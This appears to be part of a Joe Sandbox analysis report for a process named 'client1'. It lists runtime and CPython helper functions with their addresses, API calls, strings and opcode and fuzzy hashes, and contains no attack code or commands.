                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    • Opcode ID: 4b922b14ed2df5f95d6a3c8600b3e69bdbc7d02d17ce986268312cc727099299
                                                    • Instruction ID: a32a76992620bcce32b9da415b8c437fca4d69093295800ec8688661a9237d56
                                                    • Opcode Fuzzy Hash: 4b922b14ed2df5f95d6a3c8600b3e69bdbc7d02d17ce986268312cc727099299
                                                    • Instruction Fuzzy Hash: 92314FB2A1AA52E5FB068F75D8500BE27A8BB54B94F540472DF0E23694DE3CE547C3A0
                                                    Function 00007FFBAA7034A0 Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    • Opcode ID: 844bbb5691821b1cc13d245fc9a8206d144c37ccdb7aeed84f449f5af1792079
                                                    • Instruction ID: 303c55c76d5e2f6a62b87c805f38c26fdbbb76fa3d4b75715f08734d482a6e54
                                                    • Opcode Fuzzy Hash: 844bbb5691821b1cc13d245fc9a8206d144c37ccdb7aeed84f449f5af1792079
                                                    • Instruction Fuzzy Hash: CE3153B2A0AA12D5EB128F75D8540BE27A8FB44B94F444472DE0E637A4DF3CE647C360
                                                    Function 00007FFBAA70290C Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_Err_FormatObject_ParseSubtypeTupleType_
                                                    • String ID:
                                                    • API String ID: 1313511727-0
                                                    • Opcode ID: c56d67d7fb87bf70e876d31f1775e73e7f2e2e4ce7a9f9d722aab63a9b3f74bb
                                                    • Instruction ID: 4fde4ae1f4f982bfffcf68f8fc045e94b23903c4be9a2ad1a760f93ce389e416
                                                    • Opcode Fuzzy Hash: c56d67d7fb87bf70e876d31f1775e73e7f2e2e4ce7a9f9d722aab63a9b3f74bb
                                                    • Instruction Fuzzy Hash: 0B3184B2A1AA42D0EA168F75D4100BE67A8FB44B94F480072DE4D237A4DE6DE947C360
                                                    Function 00007FFBAB492DE0 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeallocFromLong_Ssize_t$BoolCompareObject_Rich
                                                    • String ID:
                                                    • API String ID: 4107546884-0
                                                    • Opcode ID: 4821959062ce02670e9ec4436a29c581b01c2ae1a39208a79a00cf5ea6450531
                                                    • Instruction ID: 9efed3fef6a6518a374f061584967590a76e6cc8bb3306dbf38b0f3ea5870812
                                                    • Opcode Fuzzy Hash: 4821959062ce02670e9ec4436a29c581b01c2ae1a39208a79a00cf5ea6450531
                                                    • Instruction Fuzzy Hash: 9D119172A0AA4352EE564B3AE9E427D5291AF55BF0F089334CE7E067F4DF2CE8418340
                                                    Function 00007FFBAA6F3B70 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FFBAA6FE780: PyContextVar_Get.PYTHON311(?,?,?,?,00007FFBAA6F1345), ref: 00007FFBAA6FE792
                                                    • PyUnicode_New.PYTHON311(?,?,?,00007FFBAA6F3A6E), ref: 00007FFBAA6F3BD6
                                                    • memmove.VCRUNTIME140(?,?,?,00007FFBAA6F3A6E), ref: 00007FFBAA6F3C0B
                                                    • PyMem_Free.PYTHON311(?,?,?,00007FFBAA6F3A6E), ref: 00007FFBAA6F3C13
                                                    • _Py_Dealloc.PYTHON311(?,?,?,00007FFBAA6F3A6E,?,?,?,00007FFBAA6F2508), ref: 00007FFBAA711725
                                                    • PyErr_NoMemory.PYTHON311(?,?,?,00007FFBAA6F3A6E), ref: 00007FFBAA711731
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: ContextDeallocErr_FreeMem_MemoryUnicode_Var_memmove
                                                    • String ID:
                                                    • API String ID: 3813649885-0
                                                    • Opcode ID: fde4ab65b1b8772268641664e38ce450bc40635912e65faa1664aebf4ab429c6
                                                    • Instruction ID: c13021ff3fe92464d1e325dcddc327913575fa20a815e0e9ac0be1dc165bc178
                                                    • Opcode Fuzzy Hash: fde4ab65b1b8772268641664e38ce450bc40635912e65faa1664aebf4ab429c6
                                                    • Instruction Fuzzy Hash: E02180A1B1A642C2EA169F35D81427E6798EF84FC0F042075DE0E07795DF2CE84ADB60
                                                    Function 00007FF79F6487A4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                    • Instruction ID: 994d73378fc6788d0adf3b655954d8948b8ff5b4b35ccd91aa673180338e089c
                                                    • Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                    • Instruction Fuzzy Hash: 3811CE32E58B8705F6B43138E4523F9944B6F593F4F880230EA7E06AE6DF2CAC614275
                                                    Function 00007FF79F63A860 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F63A87F
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F63A89E
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F63A8C6
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F63A8D7
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F63A8E8
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: daef540501b22c12116ffc374b0892d30f9c5b790841e2ef32b7e795c096c5e6
                                                    • Instruction ID: 87755686d646a12ca7cb0f6417ada6b8332a2dd90d1f76302ff083e3e3c9446f
                                                    • Opcode Fuzzy Hash: daef540501b22c12116ffc374b0892d30f9c5b790841e2ef32b7e795c096c5e6
                                                    • Instruction Fuzzy Hash: 27114C24E1C3C241FA78B335AA411FAE24B5F557B0F844334E87E566D6DEADB4429630
                                                    Function 00007FFBAB4979D0 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc
                                                    • String ID:
                                                    • API String ID: 3617616757-0
                                                    • Opcode ID: 59fd99aa59ad4cd2daa3baf9135be3f54364d6e67369a80bc17930a723797b6e
                                                    • Instruction ID: b1ca36f50039b0cb1884bfb0a20700c646cc0552d7abf2c0bebc63ee07f500e3
                                                    • Opcode Fuzzy Hash: 59fd99aa59ad4cd2daa3baf9135be3f54364d6e67369a80bc17930a723797b6e
                                                    • Instruction Fuzzy Hash: 5321EDB295660181EB5A8F79D8D837C32A4EF55B38F199334CE79011F2CF7E99858340
                                                    Function 00007FF79F63A6F4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F), ref: 00007FF79F63A705
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F), ref: 00007FF79F63A724
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F), ref: 00007FF79F63A74C
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F), ref: 00007FF79F63A75D
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F), ref: 00007FF79F63A76E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: 73fca214f1e943932ff67b95d9a940e5d6c6a0bd2e4835b222ff28ae142fb13c
                                                    • Instruction ID: 9076ae7c84df3867ed5b9104e1184d68ed80a24e79805a6537f48b8d8785659b
                                                    • Opcode Fuzzy Hash: 73fca214f1e943932ff67b95d9a940e5d6c6a0bd2e4835b222ff28ae142fb13c
                                                    • Instruction Fuzzy Hash: 51112A28E0C38301F978BB7148921FA92AB4F56770F840734D83E4A6D2DDADB441A631
                                                    Function 00007FFBAA6F4828 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: StringUnicode_$DeallocDict_ErrorFromItemWith
                                                    • String ID:
                                                    • API String ID: 2891578892-0
                                                    • Opcode ID: 44fa7e439cacf85886ffa34363105531bee131cff24c458678a7dc907af3b5a9
                                                    • Instruction ID: 85524c304db23abe56b5eb5ee10f8ae7e81ed780a90438840eda3b2e61e28d09
                                                    • Opcode Fuzzy Hash: 44fa7e439cacf85886ffa34363105531bee131cff24c458678a7dc907af3b5a9
                                                    • Instruction Fuzzy Hash: A9015E61B0BB82C1EA168F26E90833A66E8AB48F90F049075DD6D07B54DF3DD0478710
                                                    Function 00007FFBAA6F3C40 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 220COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memset.VCRUNTIME140(?,?,?,00007FFBAA6F3BC2,?,?,?,00007FFBAA6F3A6E), ref: 00007FFBAA6F3EC4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: memset
                                                    • String ID: VUUUUUUU$sNaN
                                                    • API String ID: 2221118986-2264336794
                                                    • Opcode ID: 5b83c14853345eac1045005ced30942e50ff53a4e18e0f424a491d81edf0acd5
                                                    • Instruction ID: deadcef6b79e65a7d7e5eb84a6338923da2d78481ee47ec98e519ed5e8f99cee
                                                    • Opcode Fuzzy Hash: 5b83c14853345eac1045005ced30942e50ff53a4e18e0f424a491d81edf0acd5
                                                    • Instruction Fuzzy Hash: AE91D6E1A0FA86C5EB1B8E29D81437D6698AF51F90F149072DE6D073D5DE2CE44BC720
                                                    Function 00007FF79F63F198 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                    • API String ID: 3215553584-1196891531
                                                    • Opcode ID: e657aeb740c2ac826b77e83addb2cc82262a2e6e3b5be7210a8d66ad85871f1f
                                                    • Instruction ID: 1542419fdd7386e72493200d0f49359441f601781debbe21f9e69f7a4f0e499c
                                                    • Opcode Fuzzy Hash: e657aeb740c2ac826b77e83addb2cc82262a2e6e3b5be7210a8d66ad85871f1f
                                                    • Instruction Fuzzy Hash: EC81C731D2C38285F7787E3D89402F8B69AAF11B48FD58035DA2D9B286CFBDE4059361
                                                    Function 00007FF79F62E108 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3544855599-2084237596
                                                    • Opcode ID: e66b2a899b3be21a272ca3efbe1e1fab7eec351de36f73ff2a6cc06a45c4f2b1
                                                    • Instruction ID: a7dcd6674dd98766165323c66a314b684f0f5cf4b64d6333bf91d0467ab5d1a8
                                                    • Opcode Fuzzy Hash: e66b2a899b3be21a272ca3efbe1e1fab7eec351de36f73ff2a6cc06a45c4f2b1
                                                    • Instruction Fuzzy Hash: 90617C32A08B858AE720AF75D8803EDB7A5FB54B88F544235EE9D57B98CF38E045C711
                                                    Function 00007FF79F62E464 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 3896166516-3733052814
                                                    • Opcode ID: 37bca86698e542f9df3f1c5971c843800452ce466371b2576d682bdca002ed1e
                                                    • Instruction ID: 89e6ea3a9b9764ae6a7bd996ea31cba2f5743fa1988ae6ff5b57a3f20f2b1cbe
                                                    • Opcode Fuzzy Hash: 37bca86698e542f9df3f1c5971c843800452ce466371b2576d682bdca002ed1e
                                                    • Instruction Fuzzy Hash: 1151B3329087C286DB74AF2199402E8B7AAFB64B94F944135DAAC87BD5CF3CE450C712
                                                    Function 00007FFBAB4A0F69 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Dict_Item
                                                    • String ID: <module>
                                                    • API String ID: 4198653253-217463007
                                                    • Opcode ID: 8be56f128c2966085a7436ac026dcbec3df9314bf8f7f933ed1dcba84a15d0ed
                                                    • Instruction ID: edc5a91d1b1e633fdd5ce01cfa6064e4e7749f4267664afe858a007c9ad92399
                                                    • Opcode Fuzzy Hash: 8be56f128c2966085a7436ac026dcbec3df9314bf8f7f933ed1dcba84a15d0ed
                                                    • Instruction Fuzzy Hash: 1641B8B650AF9181E6268F26F8402A97778FB44B94F00853ADEAE43774DF3CE461C700
                                                    Function 00007FF79F6224D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Message$ByteCharMultiWide
                                                    • String ID: %s%s: %s$Fatal error detected
                                                    • API String ID: 1878133881-2410924014
                                                    • Opcode ID: 1ad8658de8dbd2e7b08889bff9c9537d6e44ae678795f4b96bc9f189f6c45e5f
                                                    • Instruction ID: 5e41e6416dcbca17ebcc084aa2b1602857236b40ea0d1787d6511593137c4f44
                                                    • Opcode Fuzzy Hash: 1ad8658de8dbd2e7b08889bff9c9537d6e44ae678795f4b96bc9f189f6c45e5f
                                                    • Instruction Fuzzy Hash: C83174726287C191EA30BB20E4517DAA36AFB84784FC04035EA9D47A89DF3CD305CB50
                                                    Function 00007FFBAB495A10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
